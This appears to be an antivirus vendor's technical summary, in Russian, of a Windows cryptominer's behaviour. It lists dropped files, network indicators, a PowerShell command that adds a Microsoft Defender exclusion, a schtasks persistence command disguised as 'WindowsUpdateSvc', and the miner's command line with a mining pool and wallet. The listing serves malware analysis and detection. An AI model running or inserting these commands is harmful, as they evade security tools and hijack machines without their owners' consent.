Техническая информация
- <SYSTEM32>\tasks\windowsupdatesvc
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%APPDATA%\Microsoft\Windows\Caches'"
- %APPDATA%\microsoft\windows\caches\miner_protection.log
- %APPDATA%\microsoft\windows\caches\miner.log
- %APPDATA%\microsoft\windows\caches\windowsexplorersvc.exe
- %APPDATA%\microsoft\windows\caches\windowsupdatesvc.exe
- %TEMP%\task.xml
- %APPDATA%\microsoft\windows\caches\client.id
- %TEMP%\task.xml
- 'wi#####networksvc.works':443
- 'x1.#.lencr.org':80
- 'po##.#upportxmr.com':3333
- http://x1.#.lencr.org/
- 'wi#####networksvc.works':443
- 'po##.#upportxmr.com':3333
- DNS ASK wi#####networksvc.works
- DNS ASK x1.#.lencr.org
- DNS ASK po##.#upportxmr.com
- '%APPDATA%\microsoft\windows\caches\windowsexplorersvc.exe' --threads 1 --url pool.supportxmr.com:3333 --user 82pX519KkS26d9DtPeg3W13TnJ7b74YyHGnyYtLmucqE8A4kKUpM1Zf7LQpQ4EW8URfP73uJgmcjYd9gdNmbtMmESkUV2tr:rust-miner --pass x --keepalive --cpu-max-threa...
- '%WINDIR%\syswow64\wbem\wmic.exe' logicaldisk where drivetype=3 get size /format:list
- '%WINDIR%\syswow64\schtasks.exe' /create /tn WindowsUpdateSvc /xml %TEMP%\task.xml /f